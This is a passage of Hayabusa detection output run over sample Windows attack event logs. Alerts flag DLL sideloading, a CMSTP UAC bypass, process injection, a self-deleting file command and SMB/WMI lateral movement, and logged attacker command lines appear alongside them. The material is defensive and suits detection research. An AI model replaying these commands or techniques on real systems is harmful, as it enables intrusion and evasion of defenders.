+09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:31.484 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:33.449 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:33.476 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:33.495 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:36.306 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:36.312 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:40.902 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:40.903 +09:00,MSEDGEWIN10,8,high,Evas | Exec,CACTUSTORCH Remote Thread Creation,,../hayabusa-rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:45.120 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:45.130 +09:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:43:49.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 747F3D96-D8F5-5F8A-0000-00106B6F7300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx 2020-10-17 20:50:02.661 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:32:08.987 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:32:11.026 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:32:11.318 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:32:11.574 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-17 21:33:56.406 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:26:54.679 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:08.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 747F3D96-1B5C-5F8B-0000-001006AF2100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:08.734 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:10.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 01:27:10.791 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx 2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-18 07:52:31.218 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57238 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\7okjer.dll | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:52:34.249 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:52:34.966 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57239 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:01.646 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57240 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:04.161 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57241 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:04.924 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:57242 (LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx 2020-10-18 